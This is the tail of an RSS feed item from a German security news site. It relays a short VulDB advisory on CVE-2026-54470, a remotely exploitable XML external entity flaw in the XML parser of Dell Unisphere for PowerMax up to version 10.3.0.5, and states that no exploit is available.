<guid isPermaLink="true">https://tsecurity.de/de/3677881/sicherheitsluecken/cve-2026-54470-dell-unisphere-for-powermax-up-to-10305-xml-parser-xml-external-entity-reference/</guid>
<pubDate>Sat, 18 Jul 2026 13:09:17 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/dell:unisphere_for_powermax">Dell Unisphere for PowerMax up to 10.3.0.5</a>. This affects an unknown part of the component <em>XML Parser</em>. The manipulation results in xml external entity reference.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-54470">CVE-2026-54470</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,53ms -->